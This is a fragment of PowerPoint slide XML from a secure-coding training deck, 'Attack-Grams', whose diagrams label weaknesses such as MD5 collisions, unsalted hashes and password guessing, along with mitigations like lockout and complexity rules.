          <a:xfrm>
            <a:off x="1684751" y="3951962"/>
            <a:ext cx="1942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File Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MD5, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1234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4329716" y="2795923"/>
            <a:ext cx="260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(Expected File)=1234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7501" y="3595241"/>
            <a:ext cx="952500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A0CE29-9A34-0A45-8D83-CC2098AE5897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298751" y="4329520"/>
            <a:ext cx="109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MD5 Collision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack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2772219" y="5299503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(Malware)=1234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2772219" y="3142044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6108997" y="3351797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10C84C-F030-284A-BF43-67AE53ABD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605693" y="4478508"/>
            <a:ext cx="718457" cy="8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871" y="33614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Unsalted Hash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948004" y="144340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48004" y="224916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82888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998492" y="51042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532252" y="3400690"/>
            <a:ext cx="1564396" cy="1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66461" y="1879828"/>
            <a:ext cx="1638144" cy="842889"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4885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1584917" y="3667560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016871" y="1207692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3937671" y="1313410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21087"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3306922" y="2024679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4792" y="4182888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5442590" y="5107084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4615430" y="375428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BC77C3-685E-0E43-B15B-A20EA9FF91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5878" y="3010589"/>
            <a:ext cx="1522802" cy="727525"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -15805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C19FCB7-532C-BC4F-A5E6-AE42EE5A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14128"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6518029" y="3667560"/>
          <a:ext cx="2744901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190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669773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141938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md5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sha256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ABCDEFG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BB74…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9026FA9-52F8-EC4D-AA8E-D6D4746E6175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812812" y="3298228"/>
            <a:ext cx="215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Precomputed hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403018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2BA3-307F-D840-9F44-974A71B2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963" y="346237"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Guessing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8679-1F9A-2648-8F7C-86B30C5BB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4958235" y="1690688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0130-A562-DD4F-BCBD-74A67D5A6E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889342" y="256352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58B272-AACE-CA40-ACD0-650290D3E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518" y="1650856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1651-A63F-2341-9B45-5037976551C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2198316" y="2575052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399A93-1375-A142-B811-E56CD1A01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49936"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="707721" y="1690688"/>
          <a:ext cx="1302705" cy="13716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0270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123456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8270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235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6969D6-52B2-2D4D-9BD3-A2D9CEE20C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761850" y="3133280"/>
            <a:ext cx="116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Passwords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D7B3EE-DF53-E649-A73D-7981F8164B0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="2896313"/>
            <a:ext cx="8744" cy="361095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D0E3E-4EA2-A044-9E70-1BADEEACE9C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214196" y="2899032"/>
            <a:ext cx="0" cy="355187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0FBE9ED-0A51-DC44-B610-9B72D88A61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 rot="181217">
            <a:off x="5909959" y="1653210"/>
            <a:ext cx="2016164" cy="2205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4D0933-D312-5A45-B115-9DACCD38BF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142701" y="3855588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444E6-93CC-7C4A-A11E-AB559843EDAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598595" y="1787476"/>
            <a:ext cx="755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Lockout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F43FB-6CA6-0547-AD01-C445EAFD5372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6563606" y="2095807"/>
            <a:ext cx="1004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Complexity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" strike="sngStrik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C0ABE-3687-3840-9DE4-121F5FA9B675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2574756" y="3278357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D6BA40-C7AF-704D-9B1F-8219FDA4F934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690772" y="2948614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123456' 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5DCAEF-9286-B34F-8AD5-A76E9CE82105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566501" y="3292894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8F63D0-8888-8A4E-83FB-2E07A3303CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20570414">
            <a:off x="2505216" y="3561853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17866F-70FF-4E42-8C2F-FA2A56493E9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2567504" y="4171484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53EB07-703B-174C-A38E-CD5CB15BBC9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3566263" y="3843055"/>
            <a:ext cx="16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password' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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FCF0BD-0245-0946-9215-D888DB9EB2BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="4202375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0B6A8D-7E8E-E44E-AFBA-670C4A81E98C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20563066">
            <a:off x="2505014" y="4464282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08D5C5-2014-B34C-895D-C7B07265EF5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3793578" y="46501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0F4E6-168E-2F48-A802-F439CB5AFAC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2583501" y="5496063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06C3FB-36CC-7848-8DF5-AF92ED93240B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3538663" y="5195167"/>
            <a:ext cx="16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ABCDEFG' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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39125-C3EA-0940-BC5D-1594A5FC35A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2566012" y="5541499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C91574-6A93-6C4F-86F8-8A08CEE96510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20638428">
            <a:off x="2516078" y="5740911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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385697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20653</TotalTime>
  <Words>503</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>206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Courier New</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>&lt;Secure Coding Dojo/&gt; Attack-Grams</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Authentication Bypass</vt:lpstr>
      <vt:lpstr>Reliance on Untrusted Inputs</vt:lpstr>
      <vt:lpstr>Missing/Incorrect Authorization</vt:lpstr>
      <vt:lpstr>Missing Encryption of Sensitive Data</vt:lpstr>
      <vt:lpstr>Use of a Broken Crypto Algorithm</vt:lpstr>
      <vt:lpstr>Unsalted Hash</vt:lpstr>
      <vt:lpstr>Password Guessing</vt:lpstr>
      <vt:lpstr>Integer Overflow</vt:lpstr>
      <vt:lpstr>Download of Code Without  Integrity Check</vt:lpstr>
      <vt:lpstr>Open Redirect</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Upload of Dangerous File</vt:lpstr>
      <vt:lpstr>XML External Entities</vt:lpstr>
      <vt:lpstr>Path Traversal</vt:lpstr>
      <vt:lpstr>OS Command Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Insecure Deserialization</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Format String Injection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Attack-Grams</dc:title>
  <dc:subject/>
  <dc:creator>Paul Ionescu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Paul Ionescu</cp:lastModifiedBy>
  <cp:revision>81</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-08T18:07:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-25T19:46:15Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>